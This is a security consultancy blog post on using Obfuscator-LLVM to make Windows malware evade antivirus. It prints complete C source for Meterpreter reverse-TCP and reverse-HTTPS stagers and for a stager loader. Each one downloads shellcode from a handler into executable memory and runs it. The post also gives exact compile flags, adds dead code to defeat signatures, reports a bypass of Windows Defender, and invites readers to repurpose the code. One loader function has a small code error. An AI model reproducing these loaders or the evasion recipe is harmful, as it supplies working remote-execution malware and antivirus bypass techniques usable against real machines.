Automated Obfuscation of Windows Malware and Exploits Using O-LLVM

Wade Ma
Mar 3, 2020
9 min read

Updated: Nov 14, 2024

Intro

I was thinking over how easily Meterpreter stagers can be statically detected nowadays by commercial antivirus (AV) scanners and online tools like VirusTotal. The stagers can be easily detected even when using msfvenom’s built-in encoders/encryptors or the techniques of evasion frameworks, such as Veil. Then I came across a talk by Calle Svensson regarding source code obfuscation using an open-source solution, Obfuscator-LLVM. It looked like a simple and automated obfuscation tool compatible with Windows, so I thought I would give it a test run and blog about it.

Prerequisites Installs:

1. Git (https://git-scm.com/download/win)

2. CMake (https://cmake.org/download/)

Make sure the default Do not add CMake to the system PATH is unselected and that CMake is either added to the system PATH for all users or the current user.

3. mingw-w64 (http://mingw-w64.org/doku.php/download)

These are my MinGW-W64 settings. Also, don’t forget to include the /bin directory of your MinGW install into the PATH variable for your Windows environment. Edit your environment variable settings by right-clicking on This PC, selecting Properties, selecting Advanced system settings, selecting Environment Variables…, and then editing one of the Path variables.

Now open up a Powershell.exe or cmd.exe prompt, navigate to the directory where you want to install the obfuscator and enter the following commands:

git clone -b llvm-4.0 https://github.com/obfuscator-llvm/obfuscator.git
cd obfuscator
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -G "MinGW Makefiles" ../
mingw32-make.exe -j7

I got an error after the make command.

ming32-make: *** [Makefile:151: all] Error 2

But the clang.exe and clang+++.exe binaries both were successfully built in the obfuscator\build\bin directory, so I just ignored the make error.

I also added my obfuscator\build\bin directory to the PATH variable for my Windows environment.

Obfuscator-LLVM enables the automated use of 3 stackable methods of obfuscation:

1. Bogus Control Flow (-mllvm -bcf, -mllvm -bcf_loop=3, -mllvm -bcf_prob=40).

Note: The usage of large probabilities, such as -mllvm -bcf -bcf_prob=100, needs the use of an aesSeed, such as -mllvm -aesSeed=DEADBEEFDEADCODEDEADBEEFDEADCODE, for non-Unix like environments. Otherwise, you’ll be spammed with Cannot open /dev/random errors as seen below:

Also, you can dynamically input aesSeed values to programmatically generate unique binaries.

2. Control Flow Flattening (-mllvm -fla, -mllvm -split, -mllvm -split_num=3). Calle gives a good description of this type of obfuscation in his talk. Your code’s control flow becomes like a looping fork.

3. Instructions Substitution (-mllvm -sub, -mllvm -sub_loop=3)

Obfuscator-LLVM utilizes LLVM as a basis for its inner workings. LLVM is an intermediate language between system-level languages (such as C, C++, and Rust) and assembly. Thus, I needed some source code to play around with it.

After some Googling, I was able to re-create trimmed down, C source versions for Meterprerter’s reverse-tcp and reverse-https stagers.

Each one is compilable on Windows using the MinGW toolchain with the following commands:

gcc.exe -static reverse_tcp.c -o reverse_tcp.exe -lws2_32
clang.exe -static reverse_tcp.c -o reverse_tcp.exe -lws2_32
gcc.exe -static reverse_https.c -o reverse_https.exe -lwininet
clang.exe -static reverse_https.c -o reverse_https.exe -lwininet

// reverse_tcp.c
#include <stdlib.h>
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <unistd.h>

#define DEFAULT_BUFLEN 512

// https://docs.microsoft.com/en-us/windows/win32/winsock/complete-client-code
int __cdecl main(int argc, char **argv)
{
    char remote_ip[] = "127.0.0.1";
    char remote_port[] = "443";
    
    WSADATA wsaData;
    SOCKET ConnectSocket = INVALID_SOCKET;
    
    struct addrinfo *result = NULL,
    *ptr = NULL,
    hints;
    unsigned char *buffer;
        
int iResult;
int size = 0;

// Initialize Winsock
iResult = WSAStartup(MAKEWORD(2,2), &wsaData);

if (iResult != 0) {
    printf("WSAStartup failed: %d\n", iResult);
    return 1;
    }
    
  ZeroMemory( &hints, sizeof(hints) );
  hints.ai_family = AF_UNSPEC;
  hints.ai_socktype = SOCK_STREAM;
  hints.ai_protocol = IPPROTO_TCP;
  
// Resolve the server address and port
iResult = getaddrinfo(remote_ip, remote_port, &hints, &result);

if ( iResult != 0 ) {
    printf("getaddrinfo failed: %d\n", iResult);
    WSACleanup();
    return 1;
    }

// Attempt to connect to an address until one succeeds
for(ptr=result; ptr != NULL ;ptr=ptr->ai_next) {
    // Create a SOCKET for connecting to server
    ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
    ptr->ai_protocol);

    if (ConnectSocket == INVALID_SOCKET) {
        printf("socket failed with error: %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
        }

// Connect to server.
iResult = connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);

if (iResult == SOCKET_ERROR) {
    closesocket(ConnectSocket);
    ConnectSocket = INVALID_SOCKET;
    continue;
    }

break;
  }

freeaddrinfo(result);

if (ConnectSocket == INVALID_SOCKET) {
    printf("Unable to connect to server\n");
    WSACleanup();
    return 1;
  }

// https://blog.cobaltstrike.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
// read the 4-byte length
int count = recv(ConnectSocket, (char *)&size, 4, 0);

if (count != 4 || size <= 0) {
    printf("Unable to read payload size\n");
    }

//https://github.com/SherifEldeeb/inmet/blob/master/inmet/winsock_functions.cpp
buffer = (unsigned char*)VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
buffer[0] = 0xBF;

// copy the value of our socket to the buffer
memcpy(buffer + 1, &ConnectSocket, 4);

// https://github.com/SherifEldeeb/inmet/blob/master/inmet/winsock_functions.cpp
int received_bytes = 0;
int bytes_left = size;
int index = 0;

do {
    received_bytes = 0;
    received_bytes = recv(ConnectSocket, ((char*)(buffer + 5 + index)), bytes_left, 0);
    index += received_bytes;
    bytes_left -= received_bytes;
    } 
    while (bytes_left > 0);
    void (*ret)() = (void(*)())buffer;
    ret();
    
// cleanup
closesocket(ConnectSocket);
WSACleanup();
return 0;
}

 // reverse_https.c
#include <stdlib.h>
#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#include <unistd.h>
#include <time.h>

#define DEFAULT_CHECKSUM_LEN 224

// https://www.veil-framework.com/veil-framework-2-4-0-reverse-http/
// https://github.com/SherifEldeeb/inmet/blob/master/inmet/HTTP_Functions.cpp
int checksum8(char *s)
{
    int i;
    int sum = 0;
    for(i = 0; i < strlen(s); i++)
    {
        sum += (int)s[i];
        }
        return sum % 0x100;
        }

// https://www.veil-framework.com/veil-framework-2-4-0-reverse-http/
// https://cboard.cprogramming.com/c-programming/167590-c-program-generate-array[5]-random-characters-composed-z-0-9-a.html

void genHTTPChecksum(char *s)
{
    int i;
    int checksum;
    srand(time(0));
    char cks[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_";
    char test_string[DEFAULT_CHECKSUM_LEN] = {0};
    
    while(1) {
        for (i=0; i < DEFAULT_CHECKSUM_LEN-1; i++)
        test_string[i]=cks[(rand() % strlen(cks))];
        checksum = checksum8(test_string);

        if (checksum == 92) break;
        }

strncpy(s, test_string, strlen(test_string));
return;
}

int __cdecl main(int argc, char **argv)
{
    char remote_ip[] = "127.0.0.1";
    int remote_port = 443;
    char user_agent[] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36";
    char checksum_str[DEFAULT_CHECKSUM_LEN] = {0};
    char url[DEFAULT_CHECKSUM_LEN+1] = {0};
    unsigned char *buffer;

    int sec_option_flags = 0;
    genHTTPChecksum(checksum_str);
    
// https://github.com/SherifEldeeb/inmet/blob/master/inmet/HTTP_Functions.cpp
strncpy(url, "/", 1);
strncat(url, checksum_str, strlen(checksum_str));
HINTERNET hInternetOpen = InternetOpen(user_agent, INTERNET_OPEN_TYPE_PRECONFIG, 0, 0, 0);
HINTERNET hInternetConnect = InternetConnect(hInternetOpen, remote_ip, remote_port, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
HINTERNET hHTTPOpenRequest = HttpOpenRequest(hInternetConnect, "GET", url, 0, 0, 0, INTERNET_FLAG_RELOAD | \
INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI | INTERNET_FLAG_SECURE | \
INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA, 0);
sec_option_flags = SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_WRONG_USAGE | SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_REVOCATION;

InternetSetOption(hHTTPOpenRequest, INTERNET_OPTION_SECURITY_FLAGS, &sec_option_flags, sizeof(sec_option_flags));
HttpSendRequest(hHTTPOpenRequest, 0, 0, 0, 0);
buffer = (unsigned char*)VirtualAlloc(0, (4096*1024), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
DWORD bytesread = 0;
DWORD byteswritten = 0;

while (InternetReadFile(hHTTPOpenRequest, (buffer + byteswritten), 4096, &bytesread) && bytesread > 0)
  {
    byteswritten += bytesread;
  }

void (*ret)() = (void(*)())buffer;
ret();
return 0;
}

The above C code can be repurposed for your use cases. Also, a few notes about the protocols used by the above stagers to connect back to the multi-handler.

1. reverse_tcp.c: On connect back, the multi/handler outputs a 4-byte value of the size of its payload along with the payload. The multi/handler also expects the client’s socket file descriptor to be in the EDX register. The client then executes the payload.

2. reverse_https.c: The multi/handler waits to receive an HTTPS GET request from the client. This GET request must be for a URI (that without the leading “/”) has the “checksum” of 92. This “checksum” is calculated by the following algorithm: sum up all the ordinal values of the ASCII characters in the URI (without the leading “/”) and modulo that sum with 256 (0x100).

An important aside, I noticed that the multi/handler would not send the payload to the client if a small length URI, which fit the “checksum,” was used. There’s a minimum URI length required by the multi/handler before it will register the client connect back, HTTPS GET request, as valid. I did not see this minimum length requirement documented anywhere. I found it by debugging working msfvenom shellcode and noticing the HTTPS GET request for the URI

/ZdLxi-iG1OLnsOaxub_ylwU0fuPp98HjagrqZzOf1hFLSRPQOKD0kEg2VdrBN8C9MBtncADAXIsfJXsgO3Uljm9yT15vXo8tAf94YfwgjO32zthgAHV--MlEUFbFMX3zx-yELf7GL319JO7NjVk1L_2O6twhZfaHuXuCl19dADUgKO0LimX0RZJLunl26ZCeBgvUUByCoKGsb1jpKCraYa80vXJwAu4.

Below is a screenshot of me breaking at the call to HttpOpenRequest to view the GET URI requested in msfvenom reverse_https shellcode.

Back to my attempt at obfuscating code. I decided to use the source code of Raphael Mudge’s loader.exe to test Obfuscator-LLVM’s abilities. Raphael Mudge’s loader.exe (https://blog.cobaltstrike.com/2012/09/13/a-loader-for-metasploits-meterpreter/) is already detected by multiple vendors on VirusTotal.

And is detected by Windows Defender.

Also, a view of the control flow of loader.exe:

For obfuscation, I ran a version of the "Full Protection" discussed in this blog post, https://blog.quarkslab.com/deobfuscation-recovering-an-ollvm-protected-program.html.

I also added deadcode to the source of loader.exe. As Calle noted in his talk, deadcode enhances the obfuscation effects of the Obfuscator LLVM. I compiled main.c using the O-LLVM options below:

clang.exe -static main.c -o test_01.exe -lws2_32 -mllvm -bcf -mllvm -bcf_prob=100 -mllvm -bcf_loop=1 -mllvm -sub -mllvm -sub_loop=3 -mllvm -fla -mllvm -split_num=10 -mllvm -aesSeed=DEADBEEFDEADCODEDEADBEEFDEADCODE

/*
 * A C-based stager client compatibility with the Metasploit Framework
 * based on a discussion on the Metasploit Framework mailing list
 *
 * @author Raphael Mudge (raffi@strategiccyber.com)
 * @license BSD License.
 *
 * Relevant messages:
 * http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
 * http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
 */

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>

/* init winsock */
void winsock_init() {
       WSADATA      wsaData;
       WORD         wVersionRequested;
       wVersionRequested = MAKEWORD(2, 2);

       if (WSAStartup(wVersionRequested, &wsaData) < 0) {
              printf("ws2_32.dll is out of date.\n");
              WSACleanup();
              exit(1);
       }
}

/* a quick routine to quit and report why we quit */
void punt(SOCKET my_socket, char * error) {
       printf("Bad things: %s\n", error);
       closesocket(my_socket);
       WSACleanup();
       exit(1);
}

/* attempt to receive all of the requested data from the socket */
int recv_all(SOCKET my_socket, void * buffer, int len) {
       int    tret   = 0;
       int    nret   = 0;
       void * start = buffer;
       while (tret < len) {
              nret = recv(my_socket, (char *)startb, len - tret, 0);
              startb += nret;
              tret   += nret;

              if (nret == SOCKET_ERROR)
                     punt(my_socket, "Could not receive data");
       }

       return tret;
}

/* establish a connection to a host:port */
SOCKET wsconnect(char * targetip, int port) {
       struct hostent *           target;
       struct sockaddr_in sock;
       SOCKET                     my_socket;

       /* setup our socket */
       my_socket = socket(AF_INET, SOCK_STREAM, 0);
       if (my_socket == INVALID_SOCKET)
              punt(my_socket, "Could not initialize socket");

       /* resolve our target */
       target = gethostbyname(targetip);
       if (target == NULL)
              punt(my_socket, "Could not resolve target");

       /* copy our target information into the sock */
       memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
       sock.sin_family = AF_INET;
       sock.sin_port = htons(port);

       /* attempt to connect */
       if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )
              punt(my_socket, "Could not connect to target");
       return my_socket;
}

int main(int argc, char * argv[]) {
    // DEAD CODE THAT DOES NOTHING BUT ENHANCE OBFUSCATION
    unsigned int n;
    unsigned int mod = n % 4;
    unsigned int res = 0;

  if (mod == 0) res = (n | 0xBAAAD0BF) * (2 ^ n);
  else if (mod == 1) res = (n & 0xBAAAD0BF) * (3 + n);
  else if (mod == 2) res = (n ^ 0xBAAAD0BF) * (4 | n);
  else res = (n + 0xBAAAD0BF) * (5 & n);

  if (mod == 0) res = (n | 0xBAAAD0BF) * (2 ^ n);
  else if (mod == 1) res = (n & 0xBAAAD0BF) * (3 + n);
  else if (mod == 2) res = (n ^ 0xBAAAD0BF) * (4 | n);
  else res = (n + 0xBAAAD0BF) * (5 & n);

  if (mod == 0) res = (n | 0xBAAAD0BF) * (2 ^ n);
  else if (mod == 1) res = (n & 0xBAAAD0BF) * (3 + n);
  else if (mod == 2) res = (n ^ 0xBAAAD0BF) * (4 | n);
  else res = (n + 0xBAAAD0BF) * (5 & n);

  if (mod == 0) res = (n | 0xBAAAD0BF) * (2 ^ n);
  else if (mod == 1) res = (n & 0xBAAAD0BF) * (3 + n);
  else if (mod == 2) res = (n ^ 0xBAAAD0BF) * (4 | n);
  else res = (n + 0xBAAAD0BF) * (5 & n);

  n = res;
  ULONG32 size;
  char * buffer;

  void (*function)();
  winsock_init();
  if (argc != 3) {
         printf("%s [host] [port]\n", argv[0]);
         exit(1);
  }

  /* connect to the handler */
  SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));

  /* read the 4-byte length */
  int count = recv(my_socket, (char *)&size, 4, 0);
  if (count != 4 || size <= 0)
         punt(my_socket, "read a strange or incomplete length value\n");
 
  /* allocate a RWX buffer */
  buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

  if (buffer == NULL)
    punt(my_socket, "could not allocate buffer\n");
    buffer[0] = 0xBF;
    
/* copy the value of our socket to the buffer */
memcpy(buffer + 1, &my_socket, 4);

/* read bytes into the buffer */
count = recv_all(my_socket, buffer + 5, size);

/* cast our buffer as a function and call it */
function = (void (*)())buffer;
function();
 return 0;
}

Afterward, I decided to view the control flow of the new binary in IDA. As expected it was heavily obfuscated.

And as expected, the binary with the same behavior as loader.exe (but enhanced with automated obfuscation) was detected by few vendors on VirusTotal, and bypasses Windows Defender.

Key Takeaways: Today’s malware authors and exploit developers have automated methods of obfuscating their software, When these techniques are combined with other techniques (such as encryption and packers), they make automated and manual analysis very difficult. Static detection and blacklisting signatures are highly ineffective. YARA rules based on static signatures of assembly instructions can be easily circumvented by a tool like O-LLVM. A great use case for O-LLVM would be to inject hidden program functionally into an otherwise normal user program. O-LLVM makes it hard to reverse the full functionality of executable code. I believe the keys to combating code obfuscation techniques are leveraging user behavioral analytics and Artificial Intelligence solutions (for example CrowdStrike Falcon and IBM QRadar Advisor with Watson).

Closing Remarks:

I went over a few Meterpreter payload detector tools (Antimeter, Anti-Pwny, and Meterpreter Payload Detection) with a colleague. It would be an interesting follow-up to rebuild the source code of Meterpreter (https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter) using O-LLVM and see how that fairs against in-memory detection tools.

Bio: Wade is a GCIH who plays CTFs.

Polito, Inc. offers a wide range of security consulting services including threat hunting, penetration testing, vulnerability assessments, incident response, digital forensics, and more. If your business or your clients have any cyber security needs, contact our experts and experience what Masterful Cyber Security is all about.